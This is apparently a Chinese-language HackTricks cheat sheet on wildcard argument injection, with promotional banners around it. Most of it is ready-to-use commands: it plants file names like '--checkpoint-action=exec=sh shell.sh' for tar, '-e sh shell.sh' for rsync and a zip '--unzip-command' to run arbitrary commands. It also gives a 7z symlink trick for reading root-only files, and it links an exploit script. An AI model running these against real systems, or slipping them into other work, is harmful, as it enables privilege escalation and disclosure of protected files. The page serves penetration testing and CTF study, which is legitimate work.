4.5 KiB
从零开始学习AWS黑客攻击直到成为专家 htARTE (HackTricks AWS 红队专家)!
支持HackTricks的其他方式:
- 如果您想在 HackTricks中看到您的公司广告 或 下载HackTricks的PDF版本,请查看订阅计划!
- 获取 官方PEASS & HackTricks商品
- 发现 PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上 关注 我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
chown, chmod
您可以指定您想要复制给其余文件的文件所有者和权限
touch "--reference=/my/own/path/filename"
您可以利用这个 https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (组合攻击)
__更多信息请见 https://www.exploit-db.com/papers/33930
Tar
执行任意命令:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
您可以利用这个 https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar 攻击)
__更多信息在 https://www.exploit-db.com/papers/33930
Rsync
执行任意命令:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
您可以利用这个 https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (rsync 攻击)
__更多信息请见 https://www.exploit-db.com/papers/33930
7z
在 7z 中,即使在 *
前使用 --
(注意 --
表示后续输入不能被当作参数处理,所以在这种情况下只是文件路径),您也可以引发一个任意错误来读取文件,因此,如果像下面这样的命令被 root 执行:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
如果您可以在执行此操作的文件夹中创建文件,您可以创建文件@root.txt
,并且文件root.txt
是指向您想要读取的文件的符号链接:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
然后,当执行 7z 时,它会将 root.txt
当作一个包含它应该压缩的文件列表的文件(这就是 @root.txt
存在的意义),当7z读取 root.txt
时,它会读取 /file/you/want/to/read
,由于这个文件的内容不是文件列表,它会抛出错误,显示内容。
更多信息请参阅HackTheBox的CTF盒子Write-ups。
Zip
执行任意命令:
zip name.zip files -T --unzip-command "sh -c whoami"
<details>
<summary><strong>从零到英雄学习AWS黑客技术,参加</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
支持HackTricks的其他方式:
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>